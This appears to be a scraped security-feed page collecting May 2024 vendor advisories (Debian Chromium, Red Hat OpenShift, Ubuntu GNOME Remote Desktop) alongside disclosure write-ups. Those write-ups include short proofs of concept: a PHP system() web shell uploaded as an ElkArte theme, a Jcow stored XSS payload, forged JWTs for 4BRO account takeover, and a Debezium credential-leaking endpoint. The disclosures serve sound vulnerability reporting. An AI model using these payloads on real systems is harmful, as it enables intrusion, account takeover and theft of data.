Debian Linux Security Advisory 5697-1 - A security issue was discovered in Chromium, which could result in the execution of arbitrary code, denial of service or information disclosure. Google is aware that an exploit for CVE-2024-5274 exists in the wild.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256- -------------------------------------------------------------------------Debian Security Advisory DSA-5697-1                   security@debian.orghttps://www.debian.org/security/                           Andres SalomonMay 24, 2024                          https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : chromiumCVE ID         : CVE-2024-5274A security issue was discovered in Chromium, which could resultin the execution of arbitrary code, denial of service or informationdisclosure. Google is aware that an exploit for CVE-2024-5274 existsin the wild.For the stable distribution (bookworm), this problem has been fixed inversion 125.0.6422.112-1~deb12u1.We recommend that you upgrade your chromium packages.For the detailed security status of chromium please refer toits security tracker page at:https://security-tracker.debian.org/tracker/chromiumFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCAAdFiEEUAUk+X1YiTIjs19qZF0CR8NudjcFAmZQvDgACgkQZF0CR8NudjemlQ//Q1bTXczbYNw/gT4PCqkr956Xe0sR9tQ660X/281kR132ri1mfMfU7WT8HCmvM3aL7r9gy5ia9RCtvThRjde7CNrI4fDux6YIsv5xnfyalcxDDjXN9uz2Iy1JMq3fRjH2MhR0zK6vNiovc8DI0BcC2sWiBy3OiXIewkzO0sq54Z8g3Q/VZq9waNAAhbW7GhznVCqC1KQOzYT6/bLi9WshF9x8tOmfbNVzqBVQ2vQIJsr02gQ+kygohuNBqJjHvkt7IgkawsdQCcxLrlM/Wwa+YYTSKtjEmFG4uoL3jvFS3uRiXoSmFBrawaS/KVQ267IiXu9qt5gn/SfXLgH2/ERau9csmLW0hlX3QeHodLD/msFNRHpMKgIplkvehP0qYqcDLGhgvP2ZmaBJMq0eU/SVB+2BKYN9SrWGSG+AHalkCGqmFzlEgbhui2zsoH9hf41uaFiRSs9sr8eMVCP2q8JXXlZAEoCi1HfP0/nbwyfsKGQ2+vn4/kzQd/HaML9JeY57rfOS7E2F2hO2xpadYJtzA6+FY8nlv9Jh6UmgpvOMTYDdITuIS5nUy2AAhIBMgHVBnIrkcxFhbkfBCyDkDKIvQeIVxy6zFpRwvBaGpJCWsMgaTs2ibWX67G6tVZmu0iDpaS86cHK4OnQmgXY6HX02iSM6te88FGl61g7qbk7hbK4==JmnS-----END PGP SIGNATURE-----

Debian Security Advisory 5697-1

ElkArte Forum version 1.1.9 suffers from a remote code execution vulnerability.

    # Exploit Title : ElkArte Forum 1.1.9 - Remote Code Execution (RCE) (Authenticated) # Date: 2024-5-24# Exploit Author: tmrswrr# Category: Webapps# Vendor Homepage: https://www.elkarte.net/# Software Link : https://github.com/elkarte/Elkarte/releases/download/v1.1.9/ElkArte_v1-1-9_install.zip# Version : 1.1.91) After login go to Manage and Install theme > https://127.0.0.1/ElkArte/index.php?action=admin;area=theme;sa=admin;c2e3e39a0d=276c2e3e39a0d65W2qg1voAFfX1yNc5m2) Upload test.zip file and click install > test.zip > test.php > <?php echo system('id'); ?>3) Go to Theme Setting > Theme Directory > https://127.0.0.1/ElkArte/themes/test/test.phpResult : uid=1000(ElkArte) gid=1000(ElkArte) groups=1000(ElkArte) uid=1000(ElkArte) gid=1000(ElkArte) groups=1000(ElkArte)

ElkArte Forum 1.1.9 Remote Code Execution

Red Hat Security Advisory 2024-2875-03 - Red Hat OpenShift Container Platform release 4.13.42 is now available with updates to packages and images that fix several bugs and add enhancements. Issues addressed include HTTP request smuggling and denial of service vulnerabilities.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_2875.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: OpenShift Container Platform 4.13.42 bug fix and security update  
Advisory ID:        RHSA-2024:2875-03  
Product:            Red Hat OpenShift Enterprise  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:2875  
Issue date:         2024-05-26  
Revision:           03  
CVE Names:          CVE-2023-45288  
====================================================================

Summary: 

Red Hat OpenShift Container Platform release 4.13.42 is now available with updates to packages and images that fix several bugs and add enhancements.

This release includes a security update for Red Hat OpenShift Container Platform 4.13.

Red Hat Product Security has rated this update as having a security impact of  Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments.

This advisory contains the container images for Red Hat OpenShift Container Platform 4.13.42. See the following advisory for the RPM packages for this release:

https://access.redhat.com/errata/RHSA-2024:2877

Space precludes documenting all of the container images in this advisory. See the following Release Notes documentation, which will be updated shortly for this release, for details about these changes:

https://docs.openshift.com/container-platform/4.13/release_notes/ocp-4-13-release-notes.html

Security Fix(es):

* golang: net/http, x/net/http2: unlimited number of CONTINUATION frames  
causes DoS (CVE-2023-45288)  
* python-gunicorn: HTTP Request Smuggling due to improper validation of  
Transfer-Encoding headers (CVE-2024-1135)  
* jose-go: improper handling of highly compressed data (CVE-2024-28180)  
* ironic-image: Unauthenticated local access to Ironic API (CVE-2024-31463)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.  
All OpenShift Container Platform 4.13 users are advised to upgrade to these updated packages and images when they are available in the appropriate release channel. To check for available updates, use the OpenShift CLI (oc) or web console. Instructions for upgrading a cluster are available at https://docs.openshift.com/container-platform/4.13/updating/updating-cluster-cli.html

Solution:

CVEs:

CVE-2023-45288

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2268273  
https://bugzilla.redhat.com/show_bug.cgi?id=2268854  
https://bugzilla.redhat.com/show_bug.cgi?id=2275280  
https://bugzilla.redhat.com/show_bug.cgi?id=2275847  
https://issues.redhat.com/browse/OCPBUGS-18674  
https://issues.redhat.com/browse/OCPBUGS-32180  
https://issues.redhat.com/browse/OCPBUGS-33062  
https://issues.redhat.com/browse/OCPBUGS-33174  
https://issues.redhat.com/browse/OCPBUGS-33252  
https://issues.redhat.com/browse/OCPBUGS-33273  
https://issues.redhat.com/browse/OCPBUGS-33280  
https://issues.redhat.com/browse/OCPBUGS-33327  
https://issues.redhat.com/browse/OCPBUGS-33448  
https://issues.redhat.com/browse/OCPBUGS-33449  
https://issues.redhat.com/browse/OCPBUGS-33581

Red Hat Security Advisory 2024-2875-03

Red Hat Security Advisory 2024-2869-03 - Red Hat OpenShift Container Platform release 4.14.26 is now available with updates to packages and images that fix several bugs and add enhancements.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_2869.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Moderate: OpenShift Container Platform 4.14.26 security update  
Advisory ID:        RHSA-2024:2869-03  
Product:            Red Hat OpenShift Enterprise  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:2869  
Issue date:         2024-05-26  
Revision:           03  
CVE Names:          CVE-2024-28180  
====================================================================

Summary: 

Red Hat OpenShift Container Platform release 4.14.26 is now available with updates to packages and images that fix several bugs and add enhancements.

This release includes a security update for Red Hat OpenShift Container Platform 4.14.

Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments.

This advisory contains the container images for Red Hat OpenShift Container Platform 4.14.26. See the following advisory for the RPM packages for this release:

https://access.redhat.com/errata/RHBA-2024:2873

Space precludes documenting all of the container images in this advisory. See the following Release Notes documentation, which will be updated shortly for this release, for details about these changes:

https://docs.openshift.com/container-platform/4.14/release_notes/ocp-4-14-release-notes.html

Security Fix(es):

* jose-go: improper handling of highly compressed data (CVE-2024-28180)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.  
All OpenShift Container Platform 4.14 users are advised to upgrade to these updated packages and images when they are available in the appropriate release channel. To check for available updates, use the OpenShift CLI (oc) or web console. Instructions for upgrading a cluster are available at https://docs.openshift.com/container-platform/4.14/updating/updating_a_cluster/updating-cluster-cli.html

Solution:

CVEs:

CVE-2024-28180

References:

https://access.redhat.com/security/updates/classification/#moderate  
https://bugzilla.redhat.com/show_bug.cgi?id=2268854  
https://issues.redhat.com/browse/OCPBUGS-14373  
https://issues.redhat.com/browse/OCPBUGS-30153  
https://issues.redhat.com/browse/OCPBUGS-32104  
https://issues.redhat.com/browse/OCPBUGS-32319  
https://issues.redhat.com/browse/OCPBUGS-33039  
https://issues.redhat.com/browse/OCPBUGS-33110  
https://issues.redhat.com/browse/OCPBUGS-33365  
https://issues.redhat.com/browse/OCPBUGS-33389  
https://issues.redhat.com/browse/OCPBUGS-33452  
https://issues.redhat.com/browse/OCPBUGS-33462  
https://issues.redhat.com/browse/OCPBUGS-33467  
https://issues.redhat.com/browse/OCPBUGS-33563

Red Hat Security Advisory 2024-2869-03

Faraday is a tool that introduces a new concept called IPE, or Integrated Penetration-Test Environment. It is a multiuser penetration test IDE designed for distribution, indexation and analysis of the generated data during the process of a security audit. The main purpose of Faraday is to re-use the available tools in the community to take advantage of them in a multiuser way.

Faraday 5.3.0

Jcow Social Networking versions 14.2 up to 16.2.1 suffer from a persistent cross site scripting vulnerability.

Change Mirror Download

    # Exploit Title: Jcow Social Networking 14.2 < 16.2.1 | Stored XSS # Date: 2024-05-23# Author: tmrswrr# Vendor Homepage: https://www.jcow.net/# Software Link: https://sourceforge.net/projects/jcow/# Tested : https://demo.jcow.net/# Version : 14.2 < 16.2.11) Login with any user Click invite place : https://127.0.0.1/Jcow/index.php?p=invite2) Write in To (Email address) field your payload : "><img src=x onerrora=confirm() onerror=confirm(1)>3) After Send invitations you will be see alert button

Jcow Social Network Cross Site Scripting

Ubuntu Security Notice 6785-1 - Matthias Gerstner discovered that GNOME Remote Desktop incorrectly performed certain user validation checks. A local attacker could possibly use this issue to obtain sensitive information, or take control of remote desktop connections.

    ==========================================================================Ubuntu Security Notice USN-6785-1May 23, 2024gnome-remote-desktop vulnerability==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 24.04 LTSSummary:GNOME Remote Desktop would allow unintended access to sensitive informationor remote desktop connections.Software Description:- gnome-remote-desktop: Remote desktop daemon for GNOMEDetails:Matthias Gerstner discovered that GNOME Remote Desktop incorrectlyperformed certain user validation checks. A local attacker could possiblyuse this issue to obtain sensitive information, or take control of remotedesktop connections.Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 24.04 LTS   gnome-remote-desktop            46.2-1~ubuntu24.04.2After a standard system update you need to reboot your computer to make allthe necessary changes.References:   https://ubuntu.com/security/notices/USN-6785-1   CVE-2024-5148Package Information:   https://launchpad.net/ubuntu/+source/gnome-remote-desktop/46.2-1~ubuntu24.04.2

Ubuntu Security Notice USN-6785-1

4BRO versions prior to 2024-04-17 suffer from insecure direct object reference and API information disclosure vulnerabilities.

    SEC Consult Vulnerability Lab Security Advisory < 20240522-0 >=======================================================================               title: Broken access control & API Information Exposure             product: 4BRO App  vulnerable version: before 2024-04-17       fixed version: 2024-04-17          CVE number: -              impact: Critical            homepage: https://www.4bro.de               found: 2023-05-07                  by: Max Rull (Office Bochum)                      SEC Consult Vulnerability Lab                      An integrated part of SEC Consult, an Eviden business                      Europe | Asia                      https://www.sec-consult.com=======================================================================Vendor description:-------------------"4BRO is a German company known for producing iced tea beverages. The brand offersa variety of flavors, including unique combinations such as peach, bubblegum,and watermelon mint. 4BRO emphasizes modern and appealing packaging, targetinga younger demographic. The company promotes its products through various platformsand incentivizes customer loyalty with their app, which allows users to collectpoints for rewards. The company's headquarters is located in Germany, and theirproducts are widely available both online and in retail stores."Source: https://www.4bro.deBusiness recommendation:------------------------The vendor has fixed the security issues in the API server as of 2024-04-17.SEC Consult highly recommends to perform a thorough security review of the productconducted by security professionals to identify and resolve potential furthersecurity issues.Vulnerability overview/description:-----------------------------------1) Broken access control via IDOR in 4BRO app APIAn IDOR vulnerability (Insecure Direct Object Reference) allows an attackerto change the username in the Bearer token used for authentication in the 4BRO app.This leads to account takeover as a result of broken access control (poor Bearertoken verification). Attackers are able to access all data or Bro points ("broins")from other users.2) API Information ExposureWhen opening the app as an unauthenticated user, the 4BRO app loads JSON datafrom a publicly available API endpoint containing sensitive data like e-mailaddresses of employees, internal invoices, a CV including personal information,a gift card etc.Proof of concept:-----------------1) Broken access control via IDOR in 4BRO app APIWhen logging in into the 4BRO app, the server returns a JWT (JSON Web Token).The "login" HTTP request looks like this:--------------------------------------------------------------------------------POST /api/user/signin HTTP/2Host: adminpanel.4bro.deContent-Type: application/json[...]{"email":"<login email>","password":"<login password>"}--------------------------------------------------------------------------------The server responds with a JWT used for authentication and additionalaccount-related data:--------------------------------------------------------------------------------HTTP/2 200 OKContent-Type: application/json; charset=utf-8[...]{     "token": "<JWT here>",     "userData": {         "isBlocked": false,         "_id": "[...]",         "userType": "USER",         "email": "<login email>",         "broins": 0,         "deviceId": null,         "userCreationDate": "2023-XX-XXTXX:XX:XX.XXXZ",         "address": [{                 "_id": "[...]",                 "streetName": "[...]",                 "streetNumber": "[...]",                 "postalcode": "[...]",                 "city": "[...]",                 "firstName": "[...]",                 "lastName": "[...]",                 "country": "at"             }         ],         "ratings": [],         "__v": 0,         "pushToken": "[...]",         "telekomUUID": "[...]"     }}--------------------------------------------------------------------------------Because the JWT is only base64-encoded, it is easy to decode the JWT'sheader and payload as clear text using JWT decoders like https://token.dev/:--------------------------------------------------------------------------------Header:{   "kid": "[...]",   "alg": "RS256"}--------------------------------------------------------------------------------Payload:{   "sub": "[...]",   "event_id": "[...]",   "token_use": "access",   "scope": "aws.cognito.signin.user.admin",   "auth_time": 1683565567,   "iss": "https://cognito-idp.eu-central-1.amazonaws.com/[...]",   "exp": 1683569167,   "iat": 1683565567,   "jti": "[...]",   "client_id": "[...]",   "username": "<login email>"}--------------------------------------------------------------------------------The payload of the JWT contains multiple values indicating that AWS Cognito is in use.By changing the "username" value of the JWT payload to a victim email, it is possibleto use the modified JWT for authenticating as the victim. The victim should alreadyhave a normally registered account in the 4BRO app. By trial and error, it turns outthat even the following modified JWT payload gets accepted by the server:--------------------------------------------------------------------------------{   "sub": "0",   "event_id": "0",   "token_use": "access",   "scope": "aws.cognito.signin.user.admin",   "auth_time": 0,   "iss": "",   "exp": 0,   "iat": 0,   "jti": "0",   "client_id": "0",   "username": "<login email>"}--------------------------------------------------------------------------------Meanwhile, the "kid" property in the JWT header must be a valid value, but can belongto any other already existing 4BRO app account. The JWT signature can be the sameand does not get verified at all.Using the modified JWT, all API methods supported by the 4BRO app can be executed.Because the server only checks the "username" property in the JWT payload and doesslim to none JWT verification, the server thinks that the request came from theaccount associated with the login email contained in the "username" property.This way, sensitive data such as the current "broin" balance, full user data as seenin the login response, previous transactions, redeemed vouchers and goodies etc.can be accessed without restrictions, using the 4BRO API. Also, the "sending broins"action can be performed so that earned "broins" could be transferred to an attacker'saccount balance.2) API Information ExposureBy monitoring the 4BRO app's requests over a proxy, it can be observed thatthe following HTTP request is made when opening the "Goodies" section of the app:--------------------------------------------------------------------------------GET /api/goodies?pageSize=1000 HTTP/2Host: adminpanel.4bro.de[...]--------------------------------------------------------------------------------The response is a JSON object containing all goodies that are or were at some pointavailable in the 4BRO app:--------------------------------------------------------------------------------HTTP/2 200 OKContent-Type: application/json; charset=utf-8Content-Length: 327138[...]{     "goodiesList": [{             "_id": "61950603005c650530b63aac",             "name": "1x 4BRO Getränk Imbiss",             "longDescription": "[...]",             "shortDescription": "Auf unseren Nacken!",             "imagePath":"https://broappasset-prod.s3.eu-central-1.amazonaws.com/dev/goodies/app_kachel_food_256x256.jpg",             "category": "Food",             "quantity": 999999999999808,             "costOfGoodie": 250,             "supplier": "<email removed>",             "totalGoodies": 999999999999861,             "goodieAvailableTime": "Unlimited",             "deliveryMethod": "partnerCoupon",             "isNewGoodie": false,             "inhouseAppVoucherUrl":"https://broappasset-prod.s3.eu-central-1.amazonaws.com/dev/inhouseAppVouchers/undefined",             "__v": 1,             "rating": {                 "value": 3.991869918699184,                 "total": 123             },             "forceGoodie": "true",             "goodieAvailableEndTime": null,             "goodieAvailableStartTime": null,             "restriction": [],             "hidden": false,             "slashedCostOfGoodie": null         },{    [...]    },    [...]    }     ],     "goodieCount": 371}--------------------------------------------------------------------------------This JSON object contains already sensitive data such as the goodie supplier's emailaddresses. Out of the 371 goodies, 36 of those have a URL to a PDF file containedwithin the "inhouseAppVoucherUrl" property. Because these files are hosted on anAWS S3 bucket, everyone can access these documents without authentication.These documents seem to contain various sensitive company internal and personalinformation.While discovering vulnerability 1), we found that old gift codes were also stored asPDF files on the AWS S3 bucket. The names of the gift code PDF files indicate thatthere may be more similarly named documents (IDOR) which could be detected in anautomated way. This could be leveraged to find additional gift code PDF files storedon the AWS S3 bucket.Vulnerable / tested versions:-----------------------------The following app version has been tested and downloaded through Google Play store,which was the most recent version available at the time of the test:* 3.14.7Because the vulnerability is actually server-side within the API, the iOS app wasalso affected at the time the vulnerabilities were discovered.Vendor contact timeline:------------------------2023-06-12: Contacting vendor through broservice@4bro.de (owner) and info@dev5310.com             (developers according to Google Play store)2023-06-15: Vendor asks about the risks of the identified vulnerabilities and which             parts of the application are affected and whether any costs would arise             before they provide us with a security contact.2023-06-16: Detailed answer regarding risk estimation, responsible disclosure and             that no costs are involved.2023-06-19: Vendor requests a phone conference, scheduled for 21st June.2023-06-21: Clarifying responsible disclosure, explaining vulnerabilities and next             steps in phone call. Providing security advisory to vendor.2023-06-29: Vendor has sent the advisory to the developer team for evaluation             and will notify SEC Consult about the release of the security patch.2023-08-18: Asking for a status update.2023-08-31: It is planned to release an Android/iOS app update end of September2023-09-18: Vendor needs to postpone update, no new date available.2023-11-08: Asking for a status update; no response.2023-11-21: Asking for a status update.2023-12-11: Vendor response, fix is available in test environment, production             will be fixed by end of this year.2024-01-24: Asking for a status update; no response.2024-02-12: Asking for a status update.2024-02-12: Vendor is still waiting for a response from their IT.2024-04-17: Asking for a status update.2024-04-17: Vendor states that the vulnerabilities have been fixed.2024-04-17: Asking for the fix date, whether an app update was needed for applying             the fix, and the fixed app version. No response.2024-05-13: Asking vendor again about fixed version, etc., setting preliminary release             date to 2024-05-21. No response.2024-05-22: Release of security advisorySolution:---------The vendor implemented a fix in the affected API server as of 2024-04-17.An app update on Android or iOS is not required to apply the fix.Workaround:-----------NoneAdvisory URL:-------------https://sec-consult.com/vulnerability-lab/~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~SEC Consult Vulnerability LabAn integrated part of SEC Consult, an Eviden businessEurope | AsiaAbout SEC Consult Vulnerability LabThe SEC Consult Vulnerability Lab is an integrated part of SEC Consult, anEviden business. It ensures the continued knowledge gain of SEC Consult in thefield of network and application security to stay ahead of the attacker. TheSEC Consult Vulnerability Lab supports high-quality penetration testing andthe evaluation of new offensive and defensive technologies for our customers.Hence our customers obtain the most current information about vulnerabilitiesand valid recommendation about the risk profile of new technologies.~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~Interested to work with the experts of SEC Consult?Send us your application https://sec-consult.com/career/Interested in improving your cyber security with the experts of SEC Consult?Contact our local offices https://sec-consult.com/contact/~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~Mail: security-research at sec-consult dot comWeb: https://www.sec-consult.comBlog: https://blog.sec-consult.comTwitter: https://twitter.com/sec_consultEOF M. Rull / @2024

4BRO Insecure Direct Object Reference / API Information Exposure

Debian Linux Security Advisory 5696-1 - Security issues were discovered in Chromium, which could result in the execution of arbitrary code, denial of service or information disclosure.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256- -------------------------------------------------------------------------Debian Security Advisory DSA-5696-1                   security@debian.orghttps://www.debian.org/security/                           Andres SalomonMay 22, 2024                          https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : chromiumCVE ID         : CVE-2024-5157 CVE-2024-5158 CVE-2024-5159 CVE-2024-5160Security issues were discovered in Chromium, which could resultin the execution of arbitrary code, denial of service or informationdisclosure.For the stable distribution (bookworm), these problems have been fixed inversion 125.0.6422.76-1~deb12u1.We recommend that you upgrade your chromium packages.For the detailed security status of chromium please refer toits security tracker page at:https://security-tracker.debian.org/tracker/chromiumFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCAAdFiEEUAUk+X1YiTIjs19qZF0CR8NudjcFAmZOH24ACgkQZF0CR8Nudjeemg//Y1GqBjx++55D6XDRa23a2g0T4Y7TxemSEojcb8jR7JaVfFroql0d8fFymFyHjS9tk2dV2naoKjaOWmm87IHjGv1bQxr8b9/2qjPp5+cf7lu02jTEwSo6SroqserY1NuuJUyQfCs6K48wOjAoRDsrYHMXt2Db7Pu+nev0KB3mFWBfWrTErRQf5yoh0PxSik3hutUn8pGuLiiZZxrWsHopi+qyPSWPQU0O9o+u5jvtsmuVH1lmbu8B/QC66UWcEAWPlzstnJWf5i+4OoJA+go8jo/Z2UvRn7gEmMeUb0ykrVLJB3DY22iNrb+/801KxD2qrwZHOGR0Xm7ImnZrYG4VlWPJZjZ1AcMSZYb/cvMLaQ8Y+5k0wBipep1ICCD4/WvTN00a0D3OHIwpS2T5+gxRfQ3TWhQ6pfH90lzZZdxELOXeuiFZebW22aBjd+h5a97WPvYKoDpgM+em7a1k3cixfFucakEQA7FL5ovPmwFc9N59l/rjeFtu5QOptgq//rgj0N1EC7REAL7FWtiu8u8KOSB/sF5P9+GfWEEroHpm8ScfzBzV95Z6bYrET8qQnvGnSGz9ESaEb6W83v5oMPU54h03Xwm3gQRJqf89ke6UJYEIVkyeN5x6F2T+DUqTHhqQ5eZP8nl320BG516JXmw6jjsBF4SJeYXn/R/KFAg5Lq0==lRoo-----END PGP SIGNATURE-----

Debian Security Advisory 5696-1

Debezium UI version 2.5 suffers from a credential disclosure vulnerability.

    # Exploit Title: Debezium UI - Credential Leakage# Google Dork: N/A# Date: [2024-03-11]# Exploit Author: Ihsan Cetin, Hamza Kaya Toprak# Vendor Homepage: https://debezium.io/# Software Link: N/A# Version: < 2.5 (REQUIRED)# Tested on: [N/A]# CVE : CVE-2024-28736Proof of concept:# Details#Debezium-ui (version 2.5) is vulnerable to a password exposure issue that could allow an attacker to retrieve sensitive credentials in plaintext format.# PoC :#Unmasked Password in Connector Configuration: When navigating to the connectors section within the application's connector screen, the password field, which should ideally be masked for security purposes, is briefly displayed in plaintext format during the initial seconds.# Plaintext Password Retrieval via API Endpoint: By accessing the URLhttp://10.0.15.51:8080//api/connectors/1/account-activity/config#and searching for the database.password parameter, an attacker can retrieve the database password in plaintext format without any authentication.